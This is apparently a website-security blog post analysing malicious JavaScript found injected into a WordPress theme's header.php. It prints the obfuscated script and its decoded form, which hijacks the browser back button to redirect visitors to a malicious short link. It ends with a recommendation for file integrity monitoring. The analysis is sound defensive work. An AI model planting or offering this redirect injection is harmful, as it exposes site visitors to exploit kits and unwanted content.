Whether it is your own or a website you are visiting, undesired redirects and pop-ups are always annoying. The situation gets worse when your visitors start to get infected and your SEO ranking starts to drop.
During an Incident Response Investigation, we identified the following code in the header.php theme file:
< script type="text/javascript">document.write(unescape('%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%
74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%20%0d%0a%21%66%75%6e%63%74%69%6f%6e%28%29%7b%76%61%72%20%74%3b
%74%72%79%7b%66%6f%72%28%74%3d%30%3b%31%30%3e%74%3b%2b%2b%74%29%68%69%73%74%6f%72%79%2e%70%75%73%68%53%74%61%74%65
%28%7b%7d%2c%22%22%2c%22%22%29%3b%6f%6e%70%6f%70%73%74%61%74%65%3d%66%75%6e%63%74%69%6f%6e%28%74%29%7b%74%2e%73%74
%61%74%65%26%26%6c%6f%63%61%74%69%6f%6e%2e%72%65%70%6c%61%63%65%28%22%68%74%74%70%73%3a%2f%2f%67%6f%6f%2e%67%6c%2f
%75%52%77%74%79%49%22%29%7d%7d%63%61%74%63%68%28%6f%29%7b%7d%7d%28%29%3b%0d%0a%3c%2f%73%63%72%69%70%74%3e'));</script >
If we decode it for easier viewing, this is the result:
document.write(unescape('<script type="text/javascript"> ! function() {
var t;
try {
for (t = 0; 10 > t; ++t) history.pushState({}, "", "");
onpopstate = function(t) {
t.state && location.replace("hxxps://goo.gl/uRwtyI")
}
} catch (o) {}
}(); </script>'))
The malicious code above manipulates the browser history entries through the use of the pushState method() introduced in HTML5. In addition to that, the attackers emulated a “popstate” event that is dispatched to the browser window every time the active history entry changes. It basically means that if the visitor clicks on “Go back” in their browser (usually a left arrow beside your address bar), they would be redirected to that particular malicious goo.gl URL (hxxp://aliveforfun.com/random/).
These redirects range from leading visitors to rootkit distribution gateways (Exploit Kit), inadvertent ads and pop-ups, execution of unauthorized scripts, and much more. It’s devastating to both the website owner and their visitors and that’s why we recommend having a File Integrity Monitoring system in place to detect such injections in order to reduce its impact.